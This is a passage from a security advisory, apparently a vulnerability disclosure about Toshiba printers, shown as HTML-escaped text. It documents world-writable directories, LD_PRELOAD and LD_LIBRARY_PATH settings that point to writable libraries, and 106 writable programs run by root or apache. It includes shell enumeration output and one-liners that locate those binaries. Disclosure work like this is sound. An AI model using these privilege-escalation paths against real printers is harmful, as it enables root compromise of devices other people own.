\/home\/SYSROM_SRC\/build\/release\/sbin<br \/>total 608<br \/>drwxrwxrwx 2 root root 4096 Dec 6 01:40 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 4467 Dec 6 01:40 CheckAndRemovePerms.sh<br \/>lrwxrwxrwx 1 root root 26 Mar 14 16:27 afpd -&gt;<br \/>..\/..\/thirdparty\/sbin\/afpd<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:27 arpaname -&gt;<br \/>..\/..\/thirdparty\/sbin\/arpaname<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27 atalkd -&gt;<br \/>..\/..\/thirdparty\/sbin\/atalkd<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:27 cnid_dbd -&gt;<br \/>..\/..\/thirdparty\/sbin\/cnid_dbd<br \/>lrwxrwxrwx 1 root root 32 Mar 14 16:27 cnid_metad 
-&gt;<br \/>..\/..\/thirdparty\/sbin\/cnid_metad<br \/>lrwxrwxrwx 1 root root 34 Mar 14 16:27 ddns-confgen -&gt;<br \/>..\/..\/thirdparty\/sbin\/ddns-confgen<br \/>&#8230;<\/p>\n<p>On a side note, the `\/home\/SYSROM_SRC` directory is highly insecure<br \/>with incorrect permissions used everywhere:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC<br \/>total 52<br \/>drwxr-xr-x 9 root root 4096 Mar 14 16:34 .<br \/>drwxr-xr-x 4 root root 4096 Mar 14 16:28 ..<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:28 CBAHttpServer -&gt;<br \/>\/registration\/al\/CBAHttpServer<br \/>lrwxrwxrwx 1 root root 20 Mar 14 16:27 HDBROOT -&gt; \/home\/SYSROM_SRC\/tmp<br \/>drwxrwxrwx 7 root root 4096 Dec 6 00:46 NoBuildItems<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:28 Resources -&gt;<br \/>\/registration\/data\/Resources<br \/>lrwxrwxrwx 1 root root 32 Mar 14 16:28 Resources_eBN -&gt;<br \/>\/registration\/data\/Resources_eBN<br \/>-rwxr-xr-x 1 root root 5614 Mar 14 16:28 Startup.sh<br \/>lrwxrwxrwx 1 root root 40 Apr 6 2016 TopAccess -&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/TopAccess<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:28 TopAccessPy -&gt;<br \/>\/registration\/al\/TopAccessPy<br \/>lrwxrwxrwx 1 root root 23 Mar 14 16:28 WebAPI -&gt;<br \/>\/registration\/al\/WebAPI<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:28 WebPanel -&gt;<br \/>\/registration\/al\/WebPanel<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 bin -&gt; build\/release\/bin<br \/>drwxr-xr-x 5 root root 4096 Apr 6 2016 build<br \/>drwxrwxrwx 2 root root 4096 Dec 6 01:13 config<br \/>drwxrwxrwx 3 root root 4096 Mar 14 16:28 data<br \/>lrwxrwxrwx 1 root root 17 Mar 14 16:34 etc -&gt; build\/release\/etc<br \/>-rwxr-xr-x 1 root root 1075 Mar 14 16:27 install_rip_ram.sh<br \/>drwxrwxrwx 4 root root 4096 Mar 14 16:34 jobdata<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 lib -&gt; build\/release\/lib<br \/>drwxrwxrwx 2 root root 4096 Dec 6 04:48 logs<br \/>lrwxrwxrwx 1 root root 18 Mar 14 16:34 sbin -&gt; 
build\/release\/sbin<br \/>-rwxrwxrwx 1 root root 3492 Dec 8 2017 setenv<br \/>lrwxrwxrwx 1 root root 19 Mar 14 16:34 share -&gt; build\/release\/share<br \/>drwxr-xr-x 3 root root 4096 Dec 6 04:48 var<br \/>bash-4.1#<\/p>\n<p>An attacker can place any malicious program inside<br \/>`\/home\/SYSROM_SRC\/build\/release\/bin` or<br \/>`\/home\/SYSROM_SRC\/build\/release\/sbin` and it will be executed before<br \/>the legitimate programs stored in the regular UNIX directories<br \/>(`\/bin`, `\/usr\/bin`, `\/sbin`, `\/usr\/sbin`).<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure LD_PRELOAD<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure LD_PRELOAD variable. This Local<br \/>Privilege Escalation can also be exploited as a Remote Code Execution<br \/>by uploading a malicious library using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>Toshiba printers are configured with an insecure `LD_PRELOAD` variable:<\/p>\n<p>bash-4.1# printenv | grep LD_PRELOAD<br \/>LD_PRELOAD=\/ramdisk\/al\/libGetNameInfoInterface.so:\/ramdisk\/al\/libGetAddtInfoInterface.so:<br \/>bash-4.1#<\/p>\n<p>The `$LD_PRELOAD` variable contains 2 libraries with insecure<br \/>permissions (777), allowing any attacker to replace these libraries<br \/>with malicious libraries that will then be executed:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>Checking the permissions of libraries defined in LD_PRELOAD:<\/p>\n<p>bash-4.1# ls -la \/ramdisk\/al\/libGetNameInfoInterface.so<br \/>-rwxrwxrwx 1 root root 70813 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>bash-4.1# ls -la \/ramdisk\/al\/libGetAddtInfoInterface.so<br 
\/>-rwxrwxrwx 1 root root 87311 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>bash-4.1#<\/p>\n<p>We can confirm these 2 libraries are loaded within programs inside the printers.<\/p>\n<p>Using `\/proc\/$PID\/maps`, we can list the libraries loaded inside the<br \/>programs: these libraries are loaded inside all the programs running<br \/>as root and apache in the printers:<\/p>\n<p>bash-4.1# cd \/proc &amp;&amp; for i in *\/; do cat $i\/cmdline &amp;&amp; echo &amp;&amp;<br \/>grep ramdisk $i\/maps;done<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqnd<br \/>77788000-77797000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77797000-77799000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77799000-777a4000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777a4000-777a6000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqcs<br \/>7776d000-7777c000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>7777c000-7777e000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>7777e000-77789000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77789000-7778b000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;]\/usr\/local\/ebx\/bin\/httpd -f<br \/>\/encryption\/al\/network\/config\/httpd.conf -k start<br \/>777b5000-777c4000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c4000-777c6000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c7000-777d2000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777d2000-777d4000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>\/usr\/local\/ebx\/bin\/httpd -f<br 
\/>\/encryption\/al\/network\/config\/httpd.conf -k start<br \/>777b5000-777c4000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c4000-777c6000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c7000-777d2000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777d2000-777d4000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;].\/alusermgr<br \/>776f6000-77705000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77705000-77707000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77707000-77712000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77712000-77714000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>.\/allicensemgmt<br \/>777dc000-777eb000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777eb000-777ed000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777ed000-777f8000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777f8000-777fa000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;]\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure LD_LIBRARY_PATH<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure LD_LIBRARY_PATH variable. 
This<br \/>Local Privilege Escalation can also be exploited as a Remote Code<br \/>Execution by uploading a malicious library using the Pre-authenticated<br \/>Remote Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>Toshiba printers are configured with an insecure `$LD_LIBRARY_PATH` variable:<\/p>\n<p>bash-4.1# printenv|grep LD_LIBRARY_PATH<br \/>LD_LIBRARY_PATH=\/home\/SYSROM_SRC\/build\/release\/lib:\/mfp\/lib:\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib:\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/:\/home\/SYSROM_SRC\/build\/release\/lib<br \/>bash-4.1#<\/p>\n<p>The `$LD_LIBRARY_PATH` variable contains 4 directories with insecure<br \/>permissions (777), allowing any attacker to replace the libraries they<br \/>contain with malicious libraries that will then be executed:<\/p>\n<p>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/lib`<br \/>&#8211; &#8211; `\/mfp\/lib`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/`<\/p>\n<p>We can confirm these directories have insecure permissions and\/or the<br \/>files stored inside these directories have insecure permissions, as<br \/>shown below:<\/p>\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/build\/release\/lib`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/lib<br \/>total 391144<br \/>drwxrwxrwx 4 root root 65536 May 27 16:28 .<br \/>drwxrwxrwx 19 root root 4096 May 27 16:28 ..<br \/>lrwxrwxrwx 1 root root 38 Apr 6 2016 ImageMagick-6.3.3 -&gt;<br \/>..\/..\/thirdparty\/lib\/ImageMagick-6.3.3<br \/>lrwxrwxrwx 1 root root 38 Mar 14 16:27 ImageMagick-6.7.5 -&gt;<br \/>..\/..\/thirdparty\/lib\/ImageMagick-6.7.5<br \/>lrwxrwxrwx 1 root root 15 Mar 14 16:27 al8021XNMO.so -&gt;<br \/>al8021XNMO.so.0<br \/>-rwxrwxrwx 1 root root 223011 Dec 6 01:58 al8021XNMO.so.0<br \/>lrwxrwxrwx 1 root root 14 Mar 14 16:27 
alDDNSNMO.so -&gt; alDDNSNMO.so.0<br \/>-rwxrwxrwx 1 root root 171442 Dec 6 01:59 alDDNSNMO.so.0<br \/>lrwxrwxrwx 1 root root 13 Mar 14 16:27 alDNSNMO.so -&gt; alDNSNMO.so.0<br \/>[&#8230;]\n<p>Insecure permissions of `\/mfp\/lib`:<\/p>\n<p>bash-4.1# ls -la \/mfp\/lib<br \/>total 344308<br \/>drwxr-xr-x 2 root root 12288 May 27 16:28 .<br \/>drwxr-xr-x 8 root root 4096 May 27 16:28 ..<br \/>-rwxrwxrwx 1 root root 75 Jan 11 2013 DirectoryCopy.txt<br \/>-rwxrwxrwx 1 root root 203 Jun 29 2017 SharedFiles.ini<br \/>-rwxrwxrwx 1 root root 6210326 Jun 9 2022 laser.so<br \/>-rwxrwxrwx 1 root root 11386849 Jun 9 2022 laserc1x.so<br \/>-rwxrwxrwx 1 root root 298388 Dec 17 2017 libAbbyyZlib.so<br \/>-rwxrwxrwx 1 root root 1518996 Dec 17 2017 libBarcode.so<br \/>-rwxrwxrwx 1 root root 1045032 Dec 17 2017<br \/>libBusinessCard.Analyser.so<br \/>[&#8230;]\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib<br \/>total 49580<br \/>drwxrwxrwx 2 root root 4096 May 27 16:27 .<br \/>drwxrwxrwx 4 root root 4096 Dec 6 00:21 ..<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so.0<br \/>-rwxrwxrwx 1 root root 624082 Apr 20 2018 libCryptolib.so.0.0.0<br \/>-rwxrwxrwx 1 root root 22366570 Jun 4 2018 libFREmbed.so<br \/>lrwxrwxrwx 1 root root 14 Mar 14 16:27 libasicif.so -&gt; libasicif.so.1<br \/>lrwxrwxrwx 1 root root 16 Mar 14 16:27 libasicif.so.1 -&gt;<br \/>libasicif.so.1.0<br \/>-rwxrwxrwx 1 root root 12649 Apr 2 2016 libasicif.so.1.0<br \/>[&#8230;]\n<p>Insecure permissions of<br \/>`\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/`:<\/p>\n<p>bash-4.1# ls -la<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/<br \/>total 13036<br \/>drwxrwxrwx 2 510 510 4096 Sep 13 2019 .<br \/>drwxrwxrwx 18 510 510 4096 Sep 13 2019 ..<br \/>-rwxrwxrwx 1 510 510 84844 Aug 
25 2016<br \/>libibusplatforminputcontextplugin.so<br \/>-rwxrwxrwx 1 510 510 13252081 Sep 13 2019 libscreenkeyboardplugin.so<br \/>bash-4.1#<\/p>\n<p>Note that every library in the previous listing also has insecure<br \/>permissions.<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs<\/p>\n<p>Some vendor-specific programs are running inside Toshiba printers.<br \/>These programs run as root and have insecure permissions (777),<br \/>allowing an attacker to replace them with malicious programs. This<br \/>Local Privilege Escalation can also be exploited as a Remote Code<br \/>Execution by uploading a malicious program through the<br \/>Pre-authenticated Remote Code Execution as root or apache and multiple<br \/>Local Privilege Escalations vulnerability.<\/p>\n<p>Some programs are running as root, for example:<\/p>\n<p>bash-4.1# ps auxw | grep root<br \/>root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -h ldap:\/\/127.0.0.1 -f<br \/>\/home\/SYSROM_SRC\/build\/release\/etc\/openldap\/slapd.conf -d 1<br \/>root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02<br \/>\/home\/SYSROM_SRC\/bin\/mapper firstboot=0<br \/>[&#8230;]<br \/>root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02<br \/>.\/cissm -T 7 -d ssm.xml<br \/>root 1647 0.0 0.3 67568 9256 ? Sl 16:34 0:02<br \/>.\/cischeduler -S ramdisk<br \/>root 1648 0.0 0.3 49452 11852 ? Sl 16:34 0:00<br \/>.\/cisystemresourcemanager -T8<br \/>root 1650 0.0 0.3 50320 11112 ? S 16:34 0:00<br \/>.\/pipeMN -T8<br \/>root 1652 0.0 0.3 47372 10708 ? S 16:34 0:00 .\/cpe -T8<br \/>root 1653 0.0 0.2 35524 8888 ? S 16:34 0:00 .\/dem -T8<br \/>root 1654 0.0 0.4 53448 12588 ? S 16:34 0:00 .\/dim -T8<br \/>root 1655 0.1 0.4 96460 12128 ? Sl 16:34 0:18<br \/>.\/alboserver -T5<br \/>[&#8230;]<\/p>\n<p>Using this one-liner, it is possible to list the file on disk that<br \/>corresponds to each program running inside the printers:<\/p>\n<p>Programs running as root:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' |<br \/>grep -v '^\\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v<br \/>'supervising' | sort | uniq); do ls -la $(which &quot;$(echo $i | sed -e<br \/>'s#^\\.\/##')&quot;);done<\/p>\n<p>Running with a different user:<\/p>\n<p>for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v<br \/>'^\\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v<br \/>'supervising' | sort | uniq); do ls -la $(which &quot;$(echo $i | sed -e<br \/>'s#^\\.\/##')&quot;);done<\/p>\n<p>Together these commands list the 106 vulnerable programs found inside<br \/>the printers.<\/p>\n<p>### 3 vulnerable programs not running as root<\/p>\n<p>3 programs have been identified as vulnerable (running as a<br \/>low-privileged user, and writable by any local or remote attacker):<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/thirdparty\/sbin\/slpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/bin\/httpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>Vulnerable programs not running as root:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep -v root | awk '{ print $11 }'<br \/>| grep -v '^\\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep<br \/>-v 'supervising' | sort | uniq); do ls -la $(which &quot;$(echo $i | sed -e<br \/>'s#^\\.\/##')&quot;);done<\/p>\n<p>lrwxrwxrwx 1 root root 26 Mar 14 16:27 \/home\/SYSROM_SRC\/bin\/slpd<br \/>-&gt; ..\/..\/thirdparty\/sbin\/slpd<br \/>-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 \/usr\/local\/ebx\/bin\/httpd<br \/>-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>bash-4.1#<\/p>\n<p>Following the symbolic link for slpd confirms that its target is also<br \/>vulnerable:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/slpd<br \/>-rwxrwxrwx 1 root root 106023 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/slpd<br \/>bash-4.1#<\/p>\n<p>### 103 vulnerable programs running as root<\/p>\n<p>103 programs have been identified as vulnerable (running as root, and<br \/>writable by any local or remote attacker):<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/alllmnr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/ipv6_daemon<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/mapper<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxtransmit<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxtransmit<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_print<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_rip<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_scan<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alaccountmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alAddressBookMgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alappmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alboserver<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alcbamanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alCloning<br
\/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldevauthmgmtplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceconfigplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceserviceplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aleFilingmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aleSCL<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alExportImport<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alfilestoragem<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/algrpmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhddalertmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhddbackuprestore<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhomedatamgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alifaxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alintegritychkmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aljobcontroller<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aljobtemplatemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allicensemgmt<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allld2d<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alLogmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alLogRetriever<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allprng<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/almailboxapplication<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/almaintenanceplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alnetefiRemoteifsr<br \/>&#8211; &#8211; 
\/home\/SYSROM_SRC\/build\/release\/bin\/alnfcplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alnsm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpanel<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alPanelStartLEDHandler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alPanelUIMessageHandler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpdlfiltermanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpresentationresourcemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alprintmn<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alreportmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alreportsmsgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alrestrictionmode<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alrolemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsecurityconfiguration<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alServiceUIPlugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsharedprintDp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsoftwareupdateclient<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alstage2<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alUiFrameWork<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alulm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusbmscapplication<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusbPrint<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aluserAuthMgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusermgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alViewPlugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsdiscovery<br \/>&#8211; &#8211; 
\/home\/SYSROM_SRC\/build\/release\/bin\/alwsmex<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsprint<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsscanner<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/armn<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cipollproc<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ciprioritymanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cischeduler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cissm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cisystemresourcemanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cpe<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/de_ipfax<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/dem<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/dim<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ebx_dl<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/faxmilter<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/informationservice<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/notificationservice<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/pipeMN<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/sim<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/sljobmanagement<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ssdktimestamp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/wfpc<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/alipp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/dibbler-client<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/mDNSResponderPosix<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqcs<br \/>&#8211; 
&#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqnd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/vsftpd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/bin\/httpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>The analysis is shown below.<\/p>\n<p>Vulnerable programs running as root, with insecure permissions:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' |<br \/>grep -v '^\\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v<br \/>'supervising' | sort | uniq); do ls -la $(which &quot;$(echo $i | sed -e<br \/>'s#^\\.\/##')&quot;);done<br \/>-rwxrwxrwx 1 root root 562669 Dec 6 04:10<br 